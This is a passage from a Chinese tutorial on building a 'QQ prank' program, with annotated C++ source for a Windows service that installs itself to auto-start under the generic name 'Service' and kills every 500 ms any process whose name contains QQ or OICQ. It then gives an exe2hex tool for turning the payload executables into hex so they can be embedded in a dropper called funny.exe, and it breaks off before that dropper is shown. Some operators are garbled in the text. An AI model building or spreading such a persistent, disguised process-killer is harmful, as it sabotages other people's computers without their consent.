亲手打造一个QQ恶作剧程序 (http://www.host01.com/article/InterNet/00100002/0542318402151263_2.htm)

//

#include "stdafx.h"
#include "Service.h"
#include "winsvc.h"
#include <atlbase.h> //CRegKey类需要的头文件
#include <Afxtempl.h> //CArray类需要的头文件
#include <tlhelp32.h> //ToolHelp函数需要的头文件

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// The one and only application object
CWinApp theApp;
// File-scope using-directive kept from the original; only `cerr`/`endl` in
// _tmain rely on it.
using namespace std;
// Service status state shared by ServiceMain and Handler: both write `ss`
// and pass it to SetServiceStatus. Handler is presumably invoked on an
// SCM-owned thread, and there is no synchronization around `ss`.
SERVICE_STATUS_HANDLE ssh;
// Service control manager and service handles, filled in by InstallService.
SC_HANDLE scm,svc;
SERVICE_STATUS ss;
// Process-list snapshot entries, refilled on every KillQQ iteration.
CArray<PROCESSENTRY32,PROCESSENTRY32 &> m_PEArray;
// Forward declarations: service entry point, control handler, installer and
// the worker-thread body.
void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv);
void WINAPI Handler(DWORD Opcode);
void InstallService();
UINT KillQQ(LPVOID lpvoid);

// Program entry point. Initializes MFC, then tries to hand the process to the
// service control manager via StartServiceCtrlDispatcher; afterwards it always
// calls InstallService(). Returns 1 if MFC initialization fails, else 0.
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
int nRetCode = 0;

// initialize MFC and print and error on failure
if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0))
{
// TODO: change error code to suit your needs
cerr << _T("Fatal Error: MFC initialization failed") << endl;
nRetCode = 1;
}
else
{

SERVICE_TABLE_ENTRY ste[2];
// Service dispatch table (the original comment calls these "threads"):
// a single service named "Service" whose entry point is ServiceMain.
ste[0].lpServiceName="Service"; // name as registered with the SCM
ste[0].lpServiceProc=ServiceMain; // service entry point
// The table may hold several services; the last entry must be NULL.
ste[1].lpServiceName=NULL;
ste[1].lpServiceProc=NULL;
// Per the Win32 API contract this only succeeds when the process was
// started by the SCM; from a console it fails and returns immediately.
// The result is not checked, so InstallService() runs in both cases
// (in the service case, once the dispatcher returns).
StartServiceCtrlDispatcher(ste);
InstallService();
}

return nRetCode;
}
//安装并启动服务
// Registers <system dir>\Service.exe as an auto-start, interactive,
// own-process service named "Service" and starts it. Only the image path is
// built here; nothing in this function copies the executable to that location.
// Uses the globals scm/svc; failures are silently ignored.
void InstallService()
{
// Heap buffer for the image path; it is never delete[]'d (leaked).
LPTSTR lpSysPath=new char[MAX_PATH];
::GetSystemDirectory(lpSysPath,MAX_PATH);
LPCTSTR lpsysfilename;
// "//Service.exe" is the extraction-garbled form of "\\Service.exe"
// (a single backslash separator in the original source).
lpsysfilename=(LPCTSTR)lstrcat(lpSysPath,"//Service.exe");
scm=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
// "│" below is a garbled "|" (bitwise OR of the service-type flags).
// If OpenSCManager fails, svc keeps whatever value the global already held.
if(scm!=NULL)
svc=CreateService(scm,"Service","Service",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS│SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,lpsysfilename,NULL,NULL,NULL,NULL,NULL);
// The handle returned by CreateService is overwritten here without being
// closed (handle leak). A CreateService failure (e.g. the service already
// exists) leaves svc NULL and skips the start below.
if(svc!=NULL)
svc=OpenService(scm,"Service",SERVICE_START);
if (svc!=NULL)
{
StartService(svc,0,NULL);
CloseServiceHandle(svc);
}
// Called even when OpenSCManager failed (scm == NULL).
CloseServiceHandle(scm);
}
//服务的真正入口点函数
// Service entry point invoked by the SCM. Fills in the shared `ss`, registers
// Handler as the control handler, reports RUNNING and hands the real work to
// the KillQQ worker thread. dwArgc/lpszArgv are unused.
void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv)
{


// SERVICE_WIN32 here differs from the SERVICE_WIN32_OWN_PROCESS type the
// service was created with in InstallService.
ss.dwServiceType = SERVICE_WIN32;
ss.dwCurrentState = SERVICE_START_PENDING;
// "│" is a garbled "|". The service accepts STOP and PAUSE/CONTINUE controls.
ss.dwControlsAccepted = SERVICE_ACCEPT_STOP│ SERVICE_ACCEPT_PAUSE_CONTINUE;
ss.dwServiceSpecificExitCode = 0;
ss.dwWin32ExitCode = 0;
ss.dwCheckPoint = 0;
ss.dwWaitHint = 0;
// The START_PENDING state set above is never reported: the first
// SetServiceStatus call below already says RUNNING. ssh is not checked
// for NULL.
ssh=RegisterServiceCtrlHandler("Service",Handler);
ss.dwCurrentState = SERVICE_RUNNING;
ss.dwCheckPoint = 0;
ss.dwWaitHint = 0;
SetServiceStatus(ssh,&ss);
// Start a worker thread that implements the program's function. The
// returned CWinThread* is discarded; nothing ever signals the thread to stop.
AfxBeginThread(KillQQ,NULL,NULL);
// This second RUNNING report is identical to the first (redundant).
ss.dwCurrentState = SERVICE_RUNNING;
ss.dwCheckPoint = 0;
ss.dwWaitHint = 0;
SetServiceStatus(ssh,&ss);


}
//处理服务要求
// Service control handler registered in ServiceMain. Updates the shared `ss`
// and reports it to the SCM. Note that STOP only reports SERVICE_STOPPED:
// nothing signals the KillQQ worker, which keeps running until the process
// exits. PAUSE/CONTINUE likewise change only the reported state.
void WINAPI Handler(DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_STOP:
ss.dwCurrentState =SERVICE_STOPPED;
SetServiceStatus (ssh,&ss);
break;
case SERVICE_CONTROL_CONTINUE:
ss.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (ssh,&ss);
break;
case SERVICE_CONTROL_PAUSE:
ss.dwCurrentState = SERVICE_PAUSED;
SetServiceStatus (ssh,&ss);
break;

case SERVICE_CONTROL_INTERROGATE:
// Falls out to the unconditional report below.
break;
}

// Reported again for every code (redundant for STOP/PAUSE/CONTINUE, which
// already reported above); this is the only report for INTERROGATE and for
// unrecognized codes.
SetServiceStatus (ssh,&ss);
}
//在进程列表中查找QQ程序并杀掉的线程函数
// Worker-thread body started from ServiceMain. Loops forever: every 500 ms it
// snapshots the process list and terminates every process whose image name
// contains "QQ", "OICQ", "qq" or "oicq". This is a substring match, so any
// unrelated process with those letters in its name is hit as well. lParam is
// unused and the trailing `return 0` is unreachable.
// Defects visible here: the snapshot handle is never closed (one handle leaked
// per iteration), and the OpenProcess result is handed to TerminateProcess
// without a NULL check.
// From a defender's view the observable pattern is a service process calling
// CreateToolhelp32Snapshot, OpenProcess(PROCESS_ALL_ACCESS) and
// TerminateProcess at a fixed 500 ms cadence.
UINT KillQQ(LPVOID lParam)
{
while(1)
{

m_PEArray.RemoveAll();
HANDLE hProcessSnap=NULL;
PROCESSENTRY32 pe32;
hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe32.dwSize=sizeof(PROCESSENTRY32);
// Copy every entry into the global array; if Process32First fails
// (e.g. the snapshot failed) the array simply stays empty.
if(::Process32First(hProcessSnap,&pe32))
{
do
{
m_PEArray.Add(pe32);
}
while(::Process32Next(hProcessSnap,&pe32));

}
int i;
for(i=0;i<m_PEArray.GetSize();i++)
{
CString str;
str.Format("%s",m_PEArray[i].szExeFile);
// "││" is a garbled "||".
if(str.Find("QQ")!=-1││str.Find("OICQ")!=-1││str.Find("qq")!=-1││str.Find("oicq")!=-1)
{
HANDLE hProcess;
DWORD ProcessID;
ProcessID=m_PEArray[i].th32ProcessID;
hProcess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProcessID);
::TerminateProcess(hProcess,99); // exit code 99 is arbitrary
CloseHandle(hProcess);
}
}

Sleep(500);
}
return 0;
}
编译连接可以生成Service.exe程序.(后附整个工程)
现在我们已经得到了实现功能的两个程序,kernel.exe是在Win9X系统下实现功能的程序,Service.exe是Win2000/XP下实现功能的程序.现在就要将这两个文件转化成16进制代码.可以通过一个程序来实现,建立一个名为exe2hex的Win32 Console Application程序,程序代码如下:
#include <stdio.h>
#include <windows.h>
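/*
 * exe2hex: writes the bytes of a file to stdout as a C string literal
 * ("\x.." escapes, 16 bytes per quoted line) so the dump can be pasted into
 * source as a byte array.
 *
 * Usage: exe2hex <File>
 * Always returns 0; failures are reported on stdout (as in the original) and
 * leave the dump incomplete.
 *
 * Fixes over the original: the handle is initialized so __finally no longer
 * closes an uninitialized HANDLE on the early-exit paths; a zero-length read
 * (file shrank after GetFileSize) no longer spins forever; the "\n", "\"" and
 * "\\x" escapes are restored (they were garbled to "/n", "/"" and "//x");
 * DWORD values are printed with %lu.
 */
int main(int argc,char **argv)
{
    // Start from the sentinel so the cleanup can tell whether CreateFile
    // ever succeeded.
    HANDLE hFile = INVALID_HANDLE_VALUE;
    DWORD dwSize = 0, dwRead = 0, dwIndex = 0, i;
    unsigned char *lpBuff = NULL;
    __try
    {
        if (argc != 2)
        {
            printf("\nUsage: %s <File>", argv[0]);
            __leave;
        }

        hFile = CreateFile(argv[1], GENERIC_READ, FILE_SHARE_READ, NULL,
                           OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile == INVALID_HANDLE_VALUE)
        {
            printf("\nOpen file %s failed:%lu", argv[1], GetLastError());
            __leave;
        }
        dwSize = GetFileSize(hFile, NULL);
        if (dwSize == INVALID_FILE_SIZE)
        {
            printf("\nGet file size failed:%lu", GetLastError());
            __leave;
        }
        if (dwSize == 0)
        {
            // Nothing to dump: emit an empty literal instead of malloc(0).
            fputs("\"\"", stdout);
            __leave;
        }
        lpBuff = (unsigned char *)malloc(dwSize);
        if (!lpBuff)
        {
            // malloc does not set the Win32 last-error code, so report the
            // requested size instead of GetLastError().
            printf("\nmalloc of %lu bytes failed", dwSize);
            __leave;
        }
        // Read until the whole file is in memory; ReadFile may return short.
        while (dwSize > dwIndex)
        {
            if (!ReadFile(hFile, &lpBuff[dwIndex], dwSize - dwIndex, &dwRead, NULL))
            {
                printf("\nRead file failed:%lu", GetLastError());
                __leave;
            }
            if (dwRead == 0)
            {
                // Premature end of file: the original looped forever here.
                printf("\nRead file failed: unexpected end of file");
                __leave;
            }
            dwIndex += dwRead;
        }
        for (i = 0; i < dwSize; i++)
        {
            // The first byte opens the literal; every 16 bytes after that
            // close the current line and open a new quoted one.
            if ((i % 16) == 0)
                fputs(i == 0 ? "\"" : "\"\n\"", stdout);
            printf("\\x%.2X", lpBuff[i]);
        }
        fputs("\"", stdout);
    }
    __finally
    {
        if (lpBuff) free(lpBuff);
        if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);
    }
    return 0;
}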
编译出可执行文件exe2hex.exe,执行exe2hex kernel.exe >kernel.txt将输出结果重定向到一个文本文件就得到了kernel.exe的16进制代码,同理可以得到Service.exe的16进制代码.
啊,写了这么多还真有点累了,不过还好总算要完成了,歇口气.最后我们来编写主程序funny.exe:

 
